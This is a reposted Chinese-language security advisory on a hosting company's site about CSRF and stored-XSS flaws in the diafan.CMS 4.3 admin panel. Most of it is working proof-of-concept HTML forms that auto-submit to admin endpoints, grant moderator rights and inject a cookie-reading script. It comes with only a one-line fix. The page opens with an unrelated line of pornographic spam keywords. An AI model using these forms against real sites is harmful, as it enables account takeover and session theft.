亚洲韩日午夜视频,欧美日韩在线精品一区二区三区,韩国超清无码一区二区三区,亚洲国产成人影院播放,久草新在线,在线看片AV色

您好,歡迎來到思海網絡,我們將竭誠為您提供優質的服務! 誠征網絡推廣 | 網站備案 | 幫助中心 | 軟件下載 | 購買流程 | 付款方式 | 聯系我們 [ 會員登錄/注冊 ]
促銷推廣
客服中心
業務咨詢
有事點擊這里…  531199185
有事點擊這里…  61352289
點擊這里給我發消息  81721488
有事點擊這里…  376585780
有事點擊這里…  872642803
有事點擊這里…  459248018
有事點擊這里…  61352288
有事點擊這里…  380791050
技術支持
有事點擊這里…  714236853
有事點擊這里…  719304487
有事點擊這里…  1208894568
有事點擊這里…  61352289
在線客服
有事點擊這里…  531199185
有事點擊這里…  61352288
有事點擊這里…  983054746
有事點擊這里…  893984210
當前位置:首頁 >> 技術文章 >> 文章瀏覽
技術文章

diafan.CMS 4.3 XSS and CSRF 漏洞及修復

添加時間:2011-1-13  添加: admin 

漏洞類型:跨站XSS
漏洞描述:CSRF攻擊,該漏洞存在于“http://host/admin/usersite/save2/“腳本沒有正確驗證的HTTP請求的來源。

成功利用此漏洞可能導致應用程序的一個妥協,基于cookie的認證證書,泄露或竊取敏感數據的修改。

POC:

<input type="hidden" name="noOut" value="1">     <input type="hidden" name="save_post" value="1">     <input type="hidden" name="id" value="2">     <input type="hidden" name="fio" value="first name">     <input type="hidden" name="name" value="userlogin">     <input type="hidden" name="password" value="">     <input type="hidden" name="mail" value="email@example.com">     <input type="hidden" name="created" value="23.12.2010">     <input type="hidden" name="act" value="1">     <input type="hidden" name="moderator" value="1">     <input type="hidden" name="language" value="">     <input type="hidden" name="phone" value="phone">     <input type="hidden" name="city" value="city">     <input type="hidden" name="street" value="street">     <input type="hidden" name="home" value="5">     <input type="hidden" name="corps" value="">     <input type="hidden" name="flat" value="98">    </form>     <script>     document.main.submit();     </script>    XSS漏洞1:

由于該漏洞存在于“http://host/admin/site/save2/“提交數據未經過嚴格過濾導致提交XSS代碼。成功利用此漏洞可能導致應用程序的一個妥協,基于cookie的認證證書,泄露或竊取敏感數據的修改。

POC:

<form action="http://host/admin/site/save2/" method="post" name="main" enctype="multipart/form-data" >     <input type="hidden" name="noOut" value="1">     <input type="hidden" name="save_post" value="1">     <input type="hidden" name="id" value="2">     <input type="hidden" name="name" value="page name">     <input type="hidden" name="act" value="1">     <input type="hidden" name="actm" value="1">     <input type="hidden" name="title_meta" value="title">     <input type="hidden" name="keywords" value="">     <input type="hidden" name="descr" value="">     <input type="hidden" name="rewrite" value="sef_url">     <input type="hidden" name="addmodule" value="">     <input type="hidden" name="parent_id" value="">     <input type="hidden" name="sort" value="2">     <input type="hidden" name="theme" value="">     <input type="hidden" name="othurl" value="">     <input type="hidden" name="text" value='content html"><script>alert(document.cookie)</script>'>     </form>     <script>     document.main.submit();     </script>    

修復:

腳本正確驗證的HTTP請求的來源。
關健詞:漏洞,修復

分享到:

頂部 】 【 關閉

新文章:

版權所有:佛山思海電腦網絡有限公司 ©1998-2024 All Rights Reserved.
聯系電話:(0757)22630313、22633833
中華人民共和國增值電信業務經營許可證: 粵B1.B2-20030321 備案號:粵B2-20030321-1
網站公安備案編號:44060602000007 交互式欄目專項備案編號:200303DD003  
察察 工商 網安 舉報有獎  警警  手機打開網站